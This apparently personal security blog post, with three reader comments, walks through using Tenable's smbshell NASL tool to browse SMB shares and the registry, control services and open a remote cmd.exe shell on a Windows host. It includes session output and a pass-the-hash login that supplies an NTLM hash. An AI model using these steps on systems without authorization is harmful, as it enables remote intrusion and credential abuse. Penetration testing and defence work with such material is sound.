Description
smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :- Navigate thru the remote SMB shares and download files or obtain their version number
- Read/Enumerate the remote SMB registry
- Query/Start/Stop/Pause remote services
- Obtain an interactive shell (cmd.exe) on the remote host
Installation
smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.To run smbshell, download it and run it thru the 'nasl' command-line utility :
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbinUnder Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do :
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin
Usage
cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...
smbshell> help
The following commands are supported :
help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit
smbshell>
oh and shell, shell is fun
shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Media disconnected
Ethernet adapter Wireless Network Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
C:\WINDOWS\system32>
C:\WINDOWS\system32>exit
[*] Removing remote command service...
[*] Remote command service removed.
Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html
###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...
If you have no idea what nasl is
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html
Thanks to MC for bringing this up to me.
Lastly, If I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off because this has been out for over two years...I'll leave it at that.
3 comments:
A timely post; especially since MS just fixed this today (MS08-068).
It was first reported by CDC way back in 2001...it's about damn time. ;)
actually looking at the MS08-068 report it fixes the SMB relay vulnerability.
With this tool you either have to have a password or a hash to log in, it doesnt reflect back any creds to do the logging in.
I dont think they'll be able to fix the pass the hash thing, you just have to keep the bad guys from getting those hashes.
Very nice.
A question: do these scripts work with you?
smb_accessible_shares.nasl, smb_blank_admin_password and smb_null_session.nasl scripts
Post a Comment